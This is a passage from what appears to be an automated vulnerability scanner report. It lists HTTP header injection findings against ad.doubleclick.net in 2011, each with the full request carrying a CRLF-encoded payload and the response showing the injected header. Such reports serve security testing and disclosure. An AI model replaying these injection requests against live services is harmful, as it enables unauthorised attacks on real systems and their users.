Date: Mon, 14 Feb 2011 01:37:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2724.UndertoneNetwork/B4504763.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e8e4%0d%0a2fefa587c7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e8e4%0d%0a2fefa587c7c/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356659/Bottom-injection-British-girl-watched-U-S-drugs-agents.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e8e4
2fefa587c7c
/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285:
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3867.ContextWeb/B5127624.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d3d7%0d%0acda025163d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d3d7%0d%0acda025163d8/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d3d7
cda025163d8
/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261:
Date: Mon, 14 Feb 2011 01:40:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6457.4298.ADVERTISING.COM/B4840137.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ef38%0d%0a0fd2405f6d4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ef38%0d%0a0fd2405f6d4/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2ef38
0fd2405f6d4
/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126:
Date: Mon, 14 Feb 2011 01:40:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49ace%0d%0a79cce659e85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49ace%0d%0a79cce659e85/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;sz=300x250;contx=none;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3461791? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49ace
79cce659e85
/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-m:
Date: Mon, 14 Feb 2011 01:38:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 547d9%0d%0aaddfa21ea08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /547d9%0d%0aaddfa21ea08/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071663510365101|ec=1|secId=194|price=0.3381000030040741|pubId=562|advId=971|notifyServer=asd147.sd.pl.pvt|spId=27355|adType=iframe|invId=3099|bid=1.61|ctrack=;ord=1297647331695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/547d9
addfa21ea08
/N1558.Media6/B3897970.7;sz=300x250;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 01:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Specific_Media/B4323655.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c5f7%0d%0a4e3b8886cbe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c5f7%0d%0a4e3b8886cbe/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=5434%3Bc=123869%3Bb=785306%3Bp=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0%3Bts=20110213203406%3Bdct=;ord=20110213203406? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=123869;b=785306;ts=20110213203406;p=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0;cxt=99002376:2166629-99002135:2165456-99013532:2161575
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c5f7
4e3b8886cbe
/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http: //ads.specificmedia.com/click/v=5;m=2;l=5434;c=123869;b=785306;p=ui=uosDj9Liw_xRTA;tr=GdDAFShDwEH;tm=0-0;ts=20110213203406;dct=;ord=20110213203406
Date: Mon, 14 Feb 2011 01:34:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.usatoday/B2343920.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15b01%0d%0a972348252b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15b01%0d%0a972348252b4/N3285.usatoday/B2343920.27;sz=728x90;click=http%3A//gannett.gcion.com/adlink%2F5111%2F221898%2F0%2F225%2FAdId%3D1449317%3BBnId%3D1%3Bitime%3D647327658%3Bkey%3DDaniels%2Bat%2BCPAC%2Bcalls%2Bbroad%2Bcivil%2Bconservative%2Bcoalition%2Blaquo%2BDes%2BMoines%2BRegister%2BStaff%2BBlogs%3Blink%3D;ord=647327658? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15b01
972348252b4
/N3285.usatoday/B2343920.27;sz=728x90;click=http: //gannett.gcion.com/adlink/5111/221898/0/225/AdId=1449317;BnId=1;itime=647327658;key=Daniels+at+CPAC+calls+broad+civil+conservative+coalition+laquo+Des+Moines+Register+Staff+Blogs;link=;ord=647327658
Date: Mon, 14 Feb 2011 01:36:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d6f8%0d%0a603205b847e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d6f8%0d%0a603205b847e/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6f8
603205b847e
/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http: //a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66666%0d%0abd96a1a83dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66666%0d%0abd96a1a83dd/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66666
bd96a1a83dd
/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 02:17:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1321c%0d%0a3e041b3a832 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1321c%0d%0a3e041b3a832/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1321c
3e041b3a832
/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http: //a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418
Date: Mon, 14 Feb 2011 03:01:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72502%0d%0a12671d1359d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72502%0d%0a12671d1359d/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/198323728.198101735/289800150/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/289800150/direct;wi.728;hi.90/01/3134178?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72502
12671d1359d
/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971:
Date: Mon, 14 Feb 2011 01:52:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5367.3630.247REALMEDIAINC.1/B4475978.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8504a%0d%0adf688c05841 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8504a%0d%0adf688c05841/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670?;ord=669427212? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8504a
df688c05841
/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670
Date: Mon, 14 Feb 2011 02:47:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18c9f%0d%0a0be64f77a4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18c9f%0d%0a0be64f77a4b/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
